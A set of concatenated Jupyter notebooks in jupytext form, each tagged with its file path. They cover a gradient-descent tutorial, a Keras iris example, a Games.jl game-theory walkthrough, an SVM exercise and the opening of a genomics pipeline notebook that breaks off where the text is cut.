# With an architecture in hand, we also need a loss function, which measures how well a given set of parameters performs; the smaller its value, the better.
# + id="beJ4keYE6Zpi"
def mse(preds, targets): return ((preds-targets)**2).mean().sqrt()
# + [markdown] id="uYH1DKeR-I4U"
# Now the task is to find those parameters. The first step is to initialize them.
# + id="8rIg8AiK-BjT"
params = torch.randn(3).requires_grad_()
# + [markdown] id="WKC6luRGBkmU"
# A helper function to show the difference between the current predictions and the actual data.
# + id="tBJKglEI-boL"
def show_preds(preds, ax=None):
    if ax is None: ax = plt.subplots()[1]
    ax.scatter(time, speed)
    ax.scatter(time, to_np(preds), color='red')
    ax.set_ylim(-300, 100)
# + [markdown] id="JOk1T1-QCJDP"
# The function below performs the following steps:
#
# 1. Make predictions with the current params
# 2. Compute the loss from those predictions with the loss function
# 3. Call loss.backward to compute the gradient with respect to the current parameters
# 4. Move the current params using the learning rate (lr) and the current gradient
# 5. Report the loss
# + id="MFYgX2YWAE0M"
lr = 1e-3
def apply_step(params, prn=True):
    preds = f(time, params)
    loss = mse(preds, speed)
    loss.backward()
    params.data -= lr * params.grad.data
    params.grad = None
    if prn: print(loss.item())
    return preds
# + colab={"base_uri": "https://localhost:8080/"} id="zllxK_-lAWO1" outputId="746076a0-a8cb-4b8a-960a-eb4eda787a75"
#collapse-output
for i in range(10): apply_step(params)
# + id="Ohq8yw4E6Zpt" colab={"base_uri": "https://localhost:8080/", "height": 225} outputId="4a3c0104-cc87-49d4-a1b6-3348fb4ddfe0"
_,axs = plt.subplots(1,4,figsize=(12,3))
for ax in axs: show_preds(apply_step(params, False), ax)
plt.tight_layout()
# + [markdown] id="m19quNAQEN_B"
# # The Tricky Part
# + [markdown] id="gzRBnMkrE1Tn"
# `loss.backward` computes the gradient of the loss with respect to the current parameters. First, be clear about the goal: we want to adjust the parameters so that the loss gets smaller. In other words, for the function loss_function(params), adjust params to make the function's value smaller. A simple approach is to differentiate loss_function. For example, if loss_function = x^2 and the current x is 6, then the current loss = 6^2 = 36. How do we adjust x so the loss decreases? Take the derivative: (loss_function)' = 2*x. Then subtract a small step in the gradient's direction, scaled by lr (the learning rate): new_x = x - lr*2*x = 6 - 0.1*2*6 = 4.8. Plugging this new_x back into loss_function gives loss = 4.8^2, which is smaller than the previous 6^2.
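# The same arithmetic can be checked with a few lines of plain Python (no autograd needed); this is just the update rule from the example, with lr = 0.1:

```python
# One step of gradient descent on loss(x) = x**2, whose derivative is 2*x.
def gradient_descent_step(x, lr=0.1):
    grad = 2 * x          # d(x**2)/dx
    return x - lr * grad  # move a small step against the gradient

x = 6.0
x = gradient_descent_step(x)
print(x, x**2)  # prints: 4.8 23.04
```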
|
_notebooks/2020-12-16-SGD-1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import numpy as np
from sklearn import datasets
# + [markdown] tags=["meta", "draft"]
# # Keras Hello World
# -
# ## Install Keras
#
# https://keras.io/#installation
#
# ### Install dependencies
#
# Install TensorFlow backend: https://www.tensorflow.org/install/
#
# ```
# pip install tensorflow
# ```
#
# Install h5py (required if you plan on saving Keras models to disk): http://docs.h5py.org/en/latest/build.html#wheels
#
# ```
# pip install h5py
# ```
#
# Install pydot (used by visualization utilities to plot model graphs): https://github.com/pydot/pydot#installation
#
# ```
# pip install pydot
# ```
#
# ### Install Keras
#
# ```
# pip install keras
# ```
# ## Import packages and check versions
import tensorflow as tf
tf.__version__
import keras
keras.__version__
import h5py
h5py.__version__
import pydot
pydot.__version__
# +
from keras.models import Sequential
model = Sequential()
# +
from keras.layers import Dense
model.add(Dense(units=6, activation='relu', input_dim=4))
model.add(Dense(units=3, activation='softmax'))
# +
from keras.utils import plot_model
plot_model(model, show_shapes=True, to_file="model.png")
# -
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
iris = datasets.load_iris()
# TODO: shuffle
x_train = iris.data
y_train = np.zeros(shape=[x_train.shape[0], 3])
y_train[(iris.target == 0), 0] = 1
y_train[(iris.target == 1), 1] = 1
y_train[(iris.target == 2), 2] = 1
x_test = x_train
y_test = y_train
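# The three `y_train[...] = 1` assignments above build the one-hot matrix by hand; the same encoding fits in one NumPy expression (Keras also ships `keras.utils.to_categorical` for this). A sketch:

```python
import numpy as np

labels = np.array([0, 1, 2, 1])   # integer class labels, as in iris.target
one_hot = np.eye(3)[labels]       # row i of the 3x3 identity is the one-hot vector for class i
print(one_hot)
```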
model.fit(x_train, y_train)
model.evaluate(x_test, y_test)
model.predict(x_test)
|
nb_dev_python/python_keras_hello_en.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.4.0
# language: julia
# name: julia-1.4
# ---
# # Tools for Game Theory in Games.jl
# **<NAME>**
# *Faculty of Economics, University of Tokyo*
# This notebook demonstrates the functionalities of [Games.jl](https://github.com/QuantEcon/Games.jl).
# The first time you run this notebook,
# you need to install the Games.jl package by removing the "#" below:
# +
# using Pkg; Pkg.add(PackageSpec(url="https://github.com/QuantEcon/Games.jl"))
# -
using Games
# ## Normal Form Games
# An $N$-player *normal form game* is a triplet $g = (I, (A_i)_{i \in I}, (u_i)_{i \in I})$ where
#
# * $I = \{1, \ldots, N\}$ is the set of players,
# * $A_i = \{1, \ldots, n_i\}$ is the set of actions of player $i \in I$, and
# * $u_i \colon A_i \times A_{i+1} \times \cdots \times A_{i+N-1} \to \mathbb{R}$
# is the payoff function of player $i \in I$,
#
# where $i+j$ is understood modulo $N$.
#
# Note that we adopt the convention that the $1$-st argument of the payoff function $u_i$ is
# player $i$'s own action
# and the $j$-th argument, $j = 2, \ldots, N$, is player ($i+j-1$)'s action (modulo $N$).
# In our package,
# a normal form game and a player are represented by
# the types `NormalFormGame` and `Player`, respectively.
#
# A `Player` carries the player's payoff function and implements in particular
# a method that returns the best response action(s) given an action of the opponent player,
# or a profile of actions of the opponents if there are more than one.
#
# A `NormalFormGame` is in effect a container of `Player` instances.
# ### Creating a `NormalFormGame`
# There are several ways to create a `NormalFormGame` instance.
# The first is to pass an array of payoffs for all the players, i.e.,
# an $(N+1)$-dimensional array of shape $(n_1, \ldots, n_N, N)$
# whose $(a_1, \ldots, a_N)$-entry contains an array of the $N$ payoff values
# for the action profile $(a_1, \ldots, a_N)$.
# As an example, consider the following game ("**Matching Pennies**"):
#
# $
# \begin{bmatrix}
# 1, -1 & -1, 1 \\
# -1, 1 & 1, -1
# \end{bmatrix}
# $
matching_pennies_bimatrix = Array{Float64}(undef, 2, 2, 2)
matching_pennies_bimatrix[1, 1, :] = [1, -1] # payoff profile for action profile (1, 1)
matching_pennies_bimatrix[1, 2, :] = [-1, 1]
matching_pennies_bimatrix[2, 1, :] = [-1, 1]
matching_pennies_bimatrix[2, 2, :] = [1, -1]
g_MP = NormalFormGame(matching_pennies_bimatrix)
g_MP.players[1] # Player instance for player 1
g_MP.players[2] # Player instance for player 2
g_MP.players[1].payoff_array # Player 1's payoff array
g_MP.players[2].payoff_array # Player 2's payoff array
g_MP[1, 1] # payoff profile for action profile (1, 1)
# If a square matrix (2-dimensional array) is given,
# then it is considered to be a symmetric two-player game.
#
# Consider the following game (symmetric $2 \times 2$ "**Coordination Game**"):
#
# $
# \begin{bmatrix}
# 4, 4 & 0, 3 \\
# 3, 0 & 2, 2
# \end{bmatrix}
# $
coordination_game_matrix = [4 0;
3 2] # square matrix
g_Coo = NormalFormGame(coordination_game_matrix)
g_Coo.players[1].payoff_array # Player 1's payoff array
g_Coo.players[2].payoff_array # Player 2's payoff array
# Another example ("**Rock-Paper-Scissors**"):
#
# $
# \begin{bmatrix}
# 0, 0 & -1, 1 & 1, -1 \\
# 1, -1 & 0, 0 & -1, 1 \\
# -1, 1 & 1, -1 & 0, 0
# \end{bmatrix}
# $
RPS_matrix = [0 -1 1;
1 0 -1;
-1 1 0]
g_RPS = NormalFormGame(RPS_matrix)
# The second is to specify the sizes of the action sets of the players
# to create a `NormalFormGame` instance filled with payoff zeros,
# and then set the payoff values to each entry.
#
# Let us construct the following game ("**Prisoners' Dilemma**"):
#
# $
# \begin{bmatrix}
# 1, 1 & -2, 3 \\
# 3, -2 & 0, 0
# \end{bmatrix}
# $
g_PD = NormalFormGame((2, 2)) # There are 2 players, each of whom has 2 actions
g_PD[1, 1] = [1, 1]
g_PD[1, 2] = [-2, 3]
g_PD[2, 1] = [3, -2]
g_PD[2, 2] = [0, 0];
g_PD
g_PD.players[1].payoff_array
# Finally, a `NormalFormGame` instance can be constructed by giving an array of `Player` instances,
# as explained in the next section.
# ### Creating a `Player`
# A `Player` instance is created by passing an array of dimension $N$
# that represents the player's payoff function ("payoff array").
#
# Consider the following game (a variant of "**Battle of the Sexes**"):
#
# $
# \begin{bmatrix}
# 3, 2 & 1, 1 \\
# 0, 0 & 2, 3
# \end{bmatrix}
# $
player1 = Player([3 1; 0 2])
player2 = Player([2 0; 1 3]);
# Beware that in `payoff_array[h, k]`, `h` refers to the player's own action,
# while `k` refers to the opponent player's action.
player1.payoff_array
player2.payoff_array
# Passing an array of Player instances is the third way to create a `NormalFormGame` instance:
g_BoS = NormalFormGame((player1, player2))
# ### More than two players
# Games with more than two players are also supported.
# Let us consider the following version of $N$-player **Cournot Game**.
#
# There are $N$ firms (players) which produce a homogeneous good
# with common constant marginal cost $c \geq 0$.
# Each firm $i$ simultaneously determines the quantity $q_i \geq 0$ (action) of the good to produce.
# The inverse demand function is given by the linear function $P(Q) = a - Q$, $a > 0$,
# where $Q = q_1 + \cdots + q_N$ is the aggregate supply.
# Then the profit (payoff) for firm $i$ is given by
# $$
# u_i(q_i, q_{i+1}, \ldots, q_{i+N-1})
# = P(Q) q_i - c q_i
# = \left(a - c - \sum_{j \neq i} q_j - q_i\right) q_i.
# $$
# Theoretically, the set of actions, i.e., available quantities, may be
# the set of all nonnegative real numbers $\mathbb{R}_+$
# (or a bounded interval $[0, \bar{q}]$ with some upper bound $\bar{q}$),
# but for computation on a computer we have to discretize the action space
# and only allow for finitely many grid points.
#
# The following script creates a `NormalFormGame` instance of the Cournot game as described above,
# assuming that the (common) grid of possible quantity values is stored in an array `q_grid`.
function cournot(a::Real, c::Real, ::Val{N}, q_grid::AbstractVector{T}) where {N,T<:Real}
nums_actions = ntuple(x->length(q_grid), Val(N))
S = promote_type(typeof(a), typeof(c), T)
payoff_array= Array{S}(undef, nums_actions)
for I in CartesianIndices(nums_actions)
Q = zero(S)
for i in 1:N
Q += q_grid[I[i]]
end
payoff_array[I] = (a - c - Q) * q_grid[I[1]]
end
players = ntuple(x->Player(payoff_array), Val(N))
return NormalFormGame(players)
end
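# For comparison, the same payoff array (player 1's view) can be sketched in Python with NumPy; the helper name and the brute-force loop are illustrative, not part of Games.jl:

```python
import itertools
import numpy as np

def cournot_payoff_array(a, c, N, q_grid):
    """Payoff (a - c - Q) * q_i for player 1, over every action profile."""
    n = len(q_grid)
    payoff = np.empty((n,) * N)
    for idx in itertools.product(range(n), repeat=N):
        Q = sum(q_grid[i] for i in idx)            # aggregate supply for this profile
        payoff[idx] = (a - c - Q) * q_grid[idx[0]]
    return payoff

P = cournot_payoff_array(80, 20, 3, [10, 15])
print(P[0, 0, 0])   # (80 - 20 - 30) * 10 = 300.0
```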
# Here's a simple example with three firms,
# marginal cost $20$, and inverse demand function $80 - Q$,
# where the feasible quantity values are assumed to be $10$ and $15$.
# +
a, c = 80, 20
N = 3
q_grid = [10, 15] # [1/3 of Monopoly quantity, Nash equilibrium quantity]
g_Cou = cournot(a, c, Val(N), q_grid)
# -
g_Cou.players[1]
g_Cou.nums_actions
# ## Nash Equilibrium
# A *Nash equilibrium* of a normal form game is a profile of actions
# where the action of each player is a best response to the others'.
# The `Player` object has methods `best_response` and `best_responses`.
#
# Consider the Matching Pennies game `g_MP` defined above.
# For example, player 1's best response to the opponent's action 2 is:
best_response(g_MP.players[1], 2)
# Player 1's best responses to the opponent's mixed action `[0.5, 0.5]`
# (we know they are 1 and 2):
# By default, returns the best response action with the smallest index
best_response(g_MP.players[1], [0.5, 0.5])
# With tie_breaking=:random, returns randomly one of the best responses
best_response(g_MP.players[1], [0.5, 0.5], tie_breaking=:random) # Try several times
# `best_responses` returns an array of all the best responses:
best_responses(g_MP.players[1], [0.5, 0.5])
# For this game, we know that `([0.5, 0.5], [0.5, 0.5])` is a (unique) Nash equilibrium.
is_nash(g_MP, ([0.5, 0.5], [0.5, 0.5]))
is_nash(g_MP, (1, 1))
is_nash(g_MP, ([1., 0.], [0.5, 0.5]))
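# The definition above is easy to check by brute force; a NumPy sketch for two-player games, using the same own-action-first payoff convention as `Player`:

```python
import itertools
import numpy as np

A1 = np.array([[1, -1], [-1, 1]])   # Matching Pennies, player 1 (own action first)
A2 = np.array([[-1, 1], [1, -1]])   # player 2

def pure_nash_2p(A1, A2):
    """All pure-action profiles where each action is a best response to the other."""
    NEs = []
    for a1, a2 in itertools.product(range(A1.shape[0]), range(A2.shape[0])):
        if A1[a1, a2] >= A1[:, a2].max() and A2[a2, a1] >= A2[:, a1].max():
            NEs.append((a1, a2))
    return NEs

print(pure_nash_2p(A1, A2))   # [] -- Matching Pennies has no pure Nash equilibrium
```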
# ### Finding Nash equilibria
# Our package does not have sophisticated algorithms to compute Nash equilibria (yet)...
# One might look at the [`game_theory`](http://quanteconpy.readthedocs.io/en/latest/game_theory.html) module in [QuantEcon.py](https://github.com/QuantEcon/QuantEcon.py) or [Gambit](http://www.gambit-project.org),
# which implement several such algorithms.
# #### Brute force
# For small games, we can find pure action Nash equilibria by brute force,
# by calling the method [`pure_nash`](http://quantecon.github.io/Games.jl/latest/lib/computing_nash_equilibria.html#Games.pure_nash-Tuple{NormalFormGame}).
function print_pure_nash_brute(g::NormalFormGame)
NEs = pure_nash(g)
num_NEs = length(NEs)
if num_NEs == 0
msg = "no pure Nash equilibrium"
elseif num_NEs == 1
msg = "1 pure Nash equilibrium:\n$(NEs[1])"
else
msg = "$num_NEs pure Nash equilibria:\n"
for (i, NE) in enumerate(NEs)
i < num_NEs ? msg *= "$NE, " : msg *= "$NE"
end
end
println(join(["The game has ", msg]))
end
# Matching Pennies:
print_pure_nash_brute(g_MP)
# Coordination game:
print_pure_nash_brute(g_Coo)
# Rock-Paper-Scissors:
print_pure_nash_brute(g_RPS)
# Battle of the Sexes:
print_pure_nash_brute(g_BoS)
# Prisoners' Dilemma:
print_pure_nash_brute(g_PD)
# Cournot game:
print_pure_nash_brute(g_Cou)
# #### Sequential best response
# In some games, such as "supermodular games" and "potential games",
# the process of sequential best responses converges to a Nash equilibrium.
# Here's a script to find *one* pure Nash equilibrium by sequential best response, if it converges.
function sequential_best_response(g::NormalFormGame{N};
init_actions::Vector{Int}=ones(Int, N),
tie_breaking=:smallest,
verbose=true) where N
a = copy(init_actions)
if verbose
println("init_actions: $a")
end
new_a = Array{Int}(undef, N)
max_iter = prod(g.nums_actions)
for t in 1:max_iter
copyto!(new_a, a)
for (i, player) in enumerate(g.players)
if N == 2
a_except_i = new_a[3-i]
else
a_except_i = (new_a[i+1:N]..., new_a[1:i-1]...)
end
new_a[i] = best_response(player, a_except_i,
tie_breaking=tie_breaking)
if verbose
println("player $i: $new_a")
end
end
if new_a == a
return a
else
copyto!(a, new_a)
end
end
println("No pure Nash equilibrium found")
return a
end
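# A simplified Python variant of the same idea for two players (both players respond to the previous round's profile, rather than updating within a round as the Julia script does):

```python
import numpy as np

def sequential_best_response_2p(A1, A2, init=(0, 0), max_iter=100):
    """Iterate best responses until the action profile stops changing."""
    a = list(init)
    for _ in range(max_iter):
        new_a = [int(A1[:, a[1]].argmax()), int(A2[:, a[0]].argmax())]
        if new_a == a:
            return tuple(a)          # fixed point: a pure Nash equilibrium
        a = new_a
    return None                      # no convergence (e.g. Matching Pennies cycles)

A = np.array([[4, 0], [3, 2]])       # symmetric Coordination Game from above
print(sequential_best_response_2p(A, A))   # (0, 0)
```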
# A Cournot game with linear demand is known to be a potential game,
# for which sequential best response converges to a Nash equilibrium.
#
# Let us try a bigger instance:
a, c = 80, 20
N = 3
q_grid_size = 13
q_grid = range(0, step=div(a-c, q_grid_size-1), length=q_grid_size) # [0, 5, 10, ..., 60]
g_Cou = cournot(a, c, Val(N), q_grid)
a_star = sequential_best_response(g_Cou) # By default, start with (1, 1, 1)
println("Nash equilibrium indices: $a_star")
println("Nash equilibrium quantities: $(q_grid[a_star])")
# Start with the largest actions (13, 13, 13)
sequential_best_response(g_Cou, init_actions=[13, 13, 13])
# The limit action profile is indeed a Nash equilibrium:
is_nash(g_Cou, tuple(a_star...))
# In fact, the game has other Nash equilibria
# (because of our choice of grid points and parameter values):
print_pure_nash_brute(g_Cou)
# Make it bigger:
N = 4
q_grid_size = 61
q_grid = range(0, step=div(a-c, q_grid_size-1), length=q_grid_size) # [0, 1, 2, ..., 60]
g_Cou = cournot(a, c, Val(N), q_grid)
sequential_best_response(g_Cou)
sequential_best_response(g_Cou, init_actions=[1, 1, 1, 31])
# Sequential best response does not converge in all games:
print(g_MP) # Matching Pennies
sequential_best_response(g_MP)
# #### Support enumeration
# The routine [`support_enumeration`](http://quantecon.github.io/Games.jl/latest/lib/computing_nash_equilibria.html#Games.support_enumeration-Union{Tuple{NormalFormGame{2,T}},%20Tuple{T}}%20where%20T),
# which is for two-player games, visits all equal-size support pairs
# and checks whether each pair has a Nash equilibrium (in mixed actions) by the indifference condition.
# (This should thus be used only for small games.)
# For nondegenerate games, this routine returns all the Nash equilibria.
# Matching Pennies:
support_enumeration(g_MP)
# Coordination game:
support_enumeration(g_Coo)
# Rock-Paper-Scissors:
support_enumeration(g_RPS)
# Consider the $6 \times 6$ game by <NAME> (1997), page 12:
# +
player1 = Player(
[ 9504 -660 19976 -20526 1776 -8976;
-111771 31680 -130944 168124 -8514 52764;
397584 -113850 451176 -586476 29216 -178761;
171204 -45936 208626 -263076 14124 -84436;
1303104 -453420 1227336 -1718376 72336 -461736;
737154 -227040 774576 -1039236 48081 -300036]
)
player2 = Player(
[ 72336 -461736 1227336 -1718376 1303104 -453420;
48081 -300036 774576 -1039236 737154 -227040;
29216 -178761 451176 -586476 397584 -113850;
14124 -84436 208626 -263076 171204 -45936;
1776 -8976 19976 -20526 9504 -660;
-8514 52764 -130944 168124 -111771 31680]
)
g_vonStengel = NormalFormGame(player1, player2);
# -
length(support_enumeration(g_vonStengel))
# Note that the $n \times n$ game where the payoff matrices are given by the identity matrix
# has $2^n - 1$ equilibria.
# It had been conjectured that this is the maximum number of equilibria of
# any nondegenerate $n \times n$ game.
# The game above, the number of whose equilibria is $75 > 2^6 - 1 = 63$,
# was presented as a counter-example to this conjecture.
# Next, let us study the **All-Pay Auction**,
# where, unlike standard auctions,
# bidders pay their bids regardless of whether or not they win.
# Situations modeled as all-pay auctions include
# job promotion, R&D, and rent seeking competitions, among others.
#
# Here we consider a version of All-Pay Auction with complete information,
# symmetric bidders, discrete bids, bid caps, and "full dissipation"
# (where the prize is materialized if and only if
# there is only one bidder who makes a highest bid).
# Specifically, each of $N$ players simultaneously bids an integer from $\{0, 1, \ldots, c\}$,
# where $c$ is the common (integer) bid cap.
# If player $i$'s bid is higher than all the other players',
# then he receives the prize, whose value is $r$, common to all players,
# and pays his bid $b_i$.
# Otherwise, he pays $b_i$ and receives nothing (zero value).
# In particular, if more than one player makes the highest bid,
# the prize gets *fully dissipated* and all the players receive nothing.
# Thus, player $i$'s payoff function is
# $$
# u_i(b_i, b_{i+1}, \ldots, b_{i+N-1}) =
# \begin{cases}
# r - b_i & \text{if $b_i > b_j$ for all $j \neq i$}, \\
# -b_i & \text{otherwise}.
# \end{cases}
# $$
# The following is a script to construct a `NormalFormGame` instance
# for the All-Pay Auction game:
function all_pay_auction(r::T, c::Integer, ::Val{N};
dissipation::Bool=true) where {N,T<:Real}
nums_actions = ntuple(x->c+1, Val(N))
S = typeof(zero(T)/one(T))
payoff_array= Array{S}(undef, nums_actions)
num_ties = 0
for bids in CartesianIndices(nums_actions)
payoff_array[bids] = -(bids[1]-1)
num_ties = 1
for j in 2:N
if bids[j] > bids[1]
num_ties = 0
break
elseif bids[j] == bids[1]
if dissipation
num_ties = 0
break
else
num_ties += 1
end
end
end
if num_ties > 0
payoff_array[bids] += r / num_ties
end
end
players = ntuple(x->Player(payoff_array), Val(N))
return NormalFormGame(players)
end
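# For the two-player case, the payoff formula above collapses to one broadcast expression; a NumPy sketch of player 1's payoff array (full dissipation; the helper name is illustrative):

```python
import numpy as np

def all_pay_auction_payoffs_2p(r, c):
    """Player 1's payoffs: always pay your bid, win r only on a strictly highest bid."""
    bids = np.arange(c + 1)
    win = bids[:, None] > bids[None, :]   # own bid (rows) strictly beats opponent's (cols)
    return np.where(win, r, 0) - bids[:, None].astype(float)

P = all_pay_auction_payoffs_2p(8, 5)
print(P[3, 1])   # bid 3 beats bid 1: 8 - 3 = 5.0
print(P[2, 2])   # tie at 2: prize dissipates, payoff -2.0
```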
N = 2
c = 5 # odd
r = 8;
g_APA_odd = all_pay_auction(r, c, Val(N))
g_APA_odd.players[1]
# Clearly, this game has no pure-action Nash equilibrium.
# Indeed:
pure_nash(g_APA_odd)
# As pointed out by Dechenaux et al. (2006),
# there are three Nash equilibria when the bid cap `c` is odd
# (so that there are an even number of actions for each player):
support_enumeration(g_APA_odd)
# In addition to a symmetric, totally mixed equilibrium (the third),
# there are two asymmetric, "alternating" equilibria (the first and the second).
# If `c` is even, there is a unique equilibrium, which is symmetric and totally mixed.
# For example:
c = 6 # even
g_APA_even = all_pay_auction(r, c, Val(N))
support_enumeration(g_APA_even)
# Note:
# `support_enumeration` is executed with exact arithmetic for input games with `Rational` payoffs.
# For example:
g_Coo_rational = NormalFormGame(Rational{Int}, g_Coo)
g_Coo_rational.players[1]
support_enumeration(g_Coo_rational)
N = 2
c = 5 # odd
r = 8//1 # Rational
g_APA_odd_rational = all_pay_auction(r, c, Val(N))
support_enumeration(g_APA_odd_rational)
# ## Further Reading
#
# * [A Recursive Formulation of Repeated Games](https://nbviewer.jupyter.org/github/QuantEcon/QuantEcon.notebooks/blob/master/recursive_repeated_games.ipynb)
# ## References
#
# * <NAME>, <NAME>, and <NAME> (2006),
# "Caps on bidding in all-pay auctions:
# Comments on the experiments of <NAME> and <NAME>,"
# Journal of Economic Behavior and Organization 61, 276-283.
#
# * <NAME> (1997),
# "[New Lower Bounds for the Number of Equilibria in Bimatrix Games](http://www.maths.lse.ac.uk/personal/stengel/TEXTE/264.pdf)."
|
game_theory_jl.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Programming Exercise 6 - Support Vector Machines
# +
# # %load ../../../standard_import.txt
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from scipy.io import loadmat
from sklearn.svm import SVC
pd.set_option('display.notebook_repr_html', False)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', 150)
pd.set_option('display.max_seq_items', None)
# #%config InlineBackend.figure_formats = {'pdf',}
# %matplotlib inline
import seaborn as sns
sns.set_context('notebook')
sns.set_style('white')
# -
def plotData(X, y):
pos = (y == 1).ravel()
neg = (y == 0).ravel()
plt.scatter(X[pos,0], X[pos,1], s=60, c='k', marker='+', linewidths=1)
plt.scatter(X[neg,0], X[neg,1], s=60, c='y', marker='o', linewidths=1)
def plot_svc(svc, X, y, h=0.02, pad=0.25):
x_min, x_max = X[:, 0].min()-pad, X[:, 0].max()+pad
y_min, y_max = X[:, 1].min()-pad, X[:, 1].max()+pad
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
Z = svc.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.2)
plotData(X, y)
#plt.scatter(X[:,0], X[:,1], s=70, c=y, cmap=mpl.cm.Paired)
# Support vectors indicated in plot by vertical lines
sv = svc.support_vectors_
plt.scatter(sv[:,0], sv[:,1], c='k', marker='|', s=100, linewidths=1)
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xlabel('X1')
plt.ylabel('X2')
plt.show()
print('Number of support vectors: ', svc.support_.size)
# ### Support Vector Machines
# #### Example Dataset 1
data1 = loadmat('data/ex6data1.mat')
data1.keys()
# +
y1 = data1['y']
X1 = data1['X']
print('X1:', X1.shape)
print('y1:', y1.shape)
# -
plotData(X1,y1)
clf = SVC(C=1.0, kernel='linear')
clf.fit(X1, y1.ravel())
plot_svc(clf, X1, y1)
clf.set_params(C=100)
clf.fit(X1, y1.ravel())
plot_svc(clf, X1, y1)
# ### SVM with Gaussian Kernels
def gaussianKernel(x1, x2, sigma=2):
norm = (x1-x2).T.dot(x1-x2)
return(np.exp(-norm/(2*sigma**2)))
# +
x1 = np.array([1, 2, 1])
x2 = np.array([0, 4, -1])
sigma = 2
gaussianKernel(x1, x2, sigma)
# -
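# Note that sklearn's `'rbf'` kernel is parameterized by `gamma` rather than `sigma`; the two relate by gamma = 1/(2*sigma^2), which can be checked directly (a sketch):

```python
import numpy as np
from sklearn.metrics.pairwise import rbf_kernel

x1 = np.array([[1, 2, 1]])
x2 = np.array([[0, 4, -1]])
sigma = 2

# sklearn computes exp(-gamma * ||x1 - x2||^2)
k_sklearn = rbf_kernel(x1, x2, gamma=1 / (2 * sigma**2))[0, 0]
k_manual = np.exp(-np.sum((x1 - x2)**2) / (2 * sigma**2))
print(np.isclose(k_sklearn, k_manual))   # True
```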
# #### Example Dataset 2
data2 = loadmat('data/ex6data2.mat')
data2.keys()
# +
y2 = data2['y']
X2 = data2['X']
print('X2:', X2.shape)
print('y2:', y2.shape)
# -
plotData(X2, y2)
clf2 = SVC(C=50, kernel='rbf', gamma=6)
clf2.fit(X2, y2.ravel())
plot_svc(clf2, X2, y2)
# #### Example Dataset 3
data3 = loadmat('data/ex6data3.mat')
data3.keys()
# +
y3 = data3['y']
X3 = data3['X']
print('X3:', X3.shape)
print('y3:', y3.shape)
# -
plotData(X3, y3)
clf3 = SVC(C=1.0, kernel='poly', degree=3, gamma=10)
clf3.fit(X3, y3.ravel())
plot_svc(clf3, X3, y3)
# ### Spam classification
data4 = pd.read_table('data/vocab.txt', header=None)
data4.info()
data4.head()
|
notebooks/Programming Exercise 6 - Support Vector Machines.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# + [markdown] deletable=true editable=true
# # Union of MSigDB overlaps and DGIdb results
#
# #### Overview
#
# Aggregate the lists from step 5 into gene sets.
#
# The genes\_, dgidb\_, and gsea\_ files generated by step 5 no longer exist.
# Instead, load the json from step 5 and generate those files in a tmpdir.
#
# Then, run the R script, reading from a tmpdir,
# and storing the output files according to their paths provided by the conf.
#
# Finally, read in the output files from this step into step7 json.
# (Also keep the original output files, which the analysts use.)
#
# #### Input
#
# * the json results (5.json) of script #5, "5_get_dgidb_gsea".
# These are: gene lists, DGIDB lists, and 'gsea' lists (from Broad's MSigDB "compute overlaps")
#
# #### Output
#
# The input files are integrated together to find enriched gene sets and druggable genes.
#
# * allGeneAggregation.txt
# * GeneSetAggregation.txt
# * GeneSetDetailsPerList.txt
# * druggableGeneAggregation.txt
# * gsea_dgidb_output.xlsx
#
# Note: MSigDB input files are labeled with the "gsea\_" prefix due to association with Broad.
#
#
# ## Version history
#
# * v16
# * No longer generates xlsx file
# * adds columns to GeneSetAggregation : overlap_genes_in_comm_up overlap_genes_in_pc_up overlap_genes_in_pd_up overlap_genes_in_top5
# * v17
# * Ensures that all required columns are present even if empty
# * ignores any .json files as input to gseaMeta (will drop the GSEA creds file)
# * v18
# * Once again generates an xlsx file
# * v19
# * Python changes : now reads json and generates tmp files for r to read, instead of reading loose files. Then
# collects files created by R (except for xlsx) into json. Also broke many long lines
# into multiple lines.
#
#
# Source R script:
# * union gsea and dgidb results_vJune22.R.ipynb_version, md5: 4335daea8cce5eda70bcc61f99686cfa
# * Modified from union gsea and dgidb results_vJune22.R, md5 6be85df295e923573a0c7bdb29bb0ba6:
# + deletable=true editable=true
import os
import json
import logging
import pandas as pd
import tempfile
from collections import OrderedDict
# Setup: load conf, retrieve sample ID, logging
with open("conf.json","r") as conf:
c=json.load(conf)
sample_id = c["sample_id"]
print("Running on sample: {}".format(sample_id))
logging.basicConfig(**c["info"]["logging_config"])
logging.info("\n7: Union of MSigDB overlaps and DGIdb results")
def and_log(s):
logging.info(s)
return s
# Input files
outdir=c["dir"]["sample"]
pathway_file=c["ref_file"]["msigdb_pathway_file"]
# Output files
all_gene=c["file"]["7_out"]["all_gene_aggregation"]
drug_gene=c["file"]["7_out"]["druggable_gene_aggregation"]
geneset_agg=c["file"]["7_out"]["gene_set_aggregation"]
geneset_details=c["file"]["7_out"]["gene_set_details_per_list"]
xlsx_path=c["file"]["7_out"]["gsea_dgidb_output_excel"]
print("Reading input files from: {}".format(outdir))
print("Generating the following files for {}:\n {}".format(
sample_id,
"\n ".join([all_gene, drug_gene, geneset_agg, geneset_details, xlsx_path])
))
# Input
with open(c["json"]["5"],"r") as jf:
j5 = json.load(jf, object_pairs_hook=OrderedDict)
# Output json
j = {}
# + deletable=true editable=true
workdir = tempfile.mkdtemp(dir=c["dir"]["temp"])
logging.info("Input files for R stored in: {}".format(workdir))
workdir
# + [markdown] deletable=true editable=true
